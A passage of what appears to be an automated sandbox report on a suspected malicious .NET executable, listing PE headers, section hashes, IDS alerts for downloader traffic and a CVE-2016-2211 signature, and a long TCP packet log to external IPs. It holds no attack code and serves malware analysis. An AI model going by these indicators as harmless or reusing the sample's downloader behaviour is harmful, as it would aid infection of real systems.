                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al

                                                              Data Directories

                                                              NameVirtual AddressVirtual Size Is in Section
                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x132b200x4b.text
                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x1340000x5b8.rsrc
                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x1360000xc.reloc
                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                              Sections

                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                              .text0x20000x130b740x130c00c1ba4cccaebc52a3b4ac0236e43b464fFalse0.36893954445242data5.617292206349071IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                              .rsrc0x1340000x5b80x600626dc4aa653d05803fe56d8d96a5dea9False0.419921875data4.112783012034487IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                              .reloc0x1360000xc0x200d01b7acf3449ce74c1fc48a57271ec07False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                              Resources

                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                              RT_VERSION0x1340a00x32cdata0.4211822660098522
                                                              RT_MANIFEST0x1343cc0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                              Imports

                                                              DLLImport
                                                              mscoree.dll_CorExeMain

                                                              Network Behavior

                                                              Suricata IDS Alerts

                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                              2024-11-11T05:16:56.352623+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549705132.226.247.7380TCP
                                                              2024-11-11T05:16:57.930766+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549705132.226.247.7380TCP
                                                              2024-11-11T05:16:58.428709+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549707188.114.96.3443TCP
                                                              2024-11-11T05:16:59.149588+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549708132.226.247.7380TCP
                                                              2024-11-11T05:17:01.368274+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549710132.226.247.7380TCP
                                                              2024-11-11T05:17:01.848385+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549711188.114.96.3443TCP
                                                              2024-11-11T05:17:03.078110+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549713188.114.96.3443TCP
                                                              2024-11-11T05:17:05.539673+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549717188.114.96.3443TCP
                                                              2024-11-11T05:17:10.149548+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549722132.226.247.7380TCP
                                                              2024-11-11T05:17:10.824223+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow152.149.20.212443192.168.2.549721TCP
                                                              2024-11-11T05:17:11.415202+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549722132.226.247.7380TCP
                                                              2024-11-11T05:17:11.909969+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549730188.114.96.3443TCP
                                                              2024-11-11T05:17:12.666977+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549731132.226.247.7380TCP
                                                              2024-11-11T05:17:14.709802+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549746188.114.96.3443TCP
                                                              2024-11-11T05:17:15.949361+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549758188.114.96.3443TCP
                                                              2024-11-11T05:17:49.378677+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow152.149.20.212443192.168.2.550009TCP

                                                              Network Port Distribution

                                                              TCP Packets

                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Nov 11, 2024 05:16:52.376754045 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:52.376785040 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:52.376873016 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:52.388238907 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:52.388254881 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.062107086 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.062218904 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.066185951 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.066196918 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.066442013 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.109057903 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.151331902 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.335674047 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.335710049 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.335726976 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.335752964 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.335764885 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.335796118 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.383863926 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.384964943 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.384987116 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.385000944 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.385015965 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.385065079 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.457829952 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.457838058 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.457910061 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.458775043 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.458781958 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.458836079 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.507575035 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.507582903 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.507652044 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.508193970 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.508202076 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.508249998 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.579566002 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.579670906 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.580251932 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.580327034 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.581044912 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.581125021 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.581614971 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.581685066 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.582550049 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.582627058 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.628757000 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.628880978 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.629328966 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.629388094 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.629934072 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.630003929 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.701638937 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.701689005 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.701790094 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.701800108 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.701812983 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.701838017 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.703933001 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.704008102 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.704463005 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.704533100 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.705224037 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.705293894 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.706104040 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.706168890 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.707652092 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.707720041 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.709777117 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.709852934 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.711642027 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.711726904 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.714013100 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.714077950 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.715936899 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.716020107 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.750289917 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.750380993 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.751084089 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.751141071 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.751562119 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.751616001 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.752201080 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.752254009 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.752748966 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.752800941 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.781831980 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.781917095 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.781955957 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.782011986 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.826725006 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.826796055 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.827207088 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.827264071 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.828069925 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.828125000 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.828617096 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.828665972 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.829276085 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.829333067 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.829994917 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.830051899 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.830825090 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.830877066 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.831569910 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.831624985 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.832007885 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.832057953 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.833137989 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.833183050 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.833821058 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.833879948 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.835385084 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.835438013 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.835539103 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.835592031 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.835978985 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.836039066 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.836601019 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.836654902 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.837436914 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.837502956 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.837918043 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.837969065 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.838730097 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.838777065 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.839242935 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.839293957 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.839833975 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.839880943 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.866882086 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.866961956 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.876344919 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.876413107 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.877796888 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.877860069 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.878989935 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.879059076 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.880414963 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.880613089 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.881505013 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.881570101 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.882492065 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.882560015 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.883222103 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.883290052 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.883625031 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.883688927 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.884274006 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.884332895 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.884979963 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.885046005 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.885694027 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.885751009 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.886434078 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.886490107 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.887140036 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.887207031 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.947690010 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.947768927 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.948438883 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.948497057 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.949157000 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.949218035 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.950119972 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.950182915 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.950548887 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.950604916 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.951427937 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.951484919 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.952002048 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.952047110 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.952651978 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.952704906 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.953102112 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.953159094 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.953887939 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.953943014 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.954639912 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.954713106 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.954868078 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.954968929 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.955311060 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.955370903 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.956106901 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.956161976 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.956670046 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.956717968 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.957331896 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.957387924 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.958019972 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.958076000 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.958698034 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.958750963 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.959244013 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.959295034 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.960010052 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.960059881 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.960609913 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.960659027 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.961343050 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.961397886 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.962090015 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.962141991 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.962723017 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.962779999 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.963455915 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.963512897 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.964011908 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.964061022 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.964843988 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.964898109 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.965645075 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.965692043 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.966375113 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.966423035 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.966439009 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.966471910 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.966650963 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.966979027 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.967031002 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.967878103 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.967930079 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.968826056 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.968878984 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.969613075 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.969661951 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.970169067 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.970226049 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.970946074 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.970993996 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.972294092 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.972343922 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.974025011 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.974080086 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.976241112 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.976289034 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.977410078 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.977488041 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.977858067 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.977926016 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.979778051 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.979829073 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.981290102 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.981364965 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.986562967 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.986612082 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.989303112 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.989375114 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.996607065 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.996694088 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.997364998 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.997440100 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.997893095 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.997968912 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.998651028 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.998718023 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:53.999252081 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:53.999317884 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:54.011884928 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:54.011965036 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:54.029186010 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:54.029284000 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:54.029937029 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:54.030006886 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:54.030435085 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:54.030495882 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:54.031270027 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:54.031330109 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:54.031882048 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:54.031965017 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:54.032198906 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:54.032284021 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:54.032535076 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:54.032578945 CET49704443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:16:54.032588959 CET44349704185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:16:54.032602072 CET44349704185.78.221.73192.168.2.5
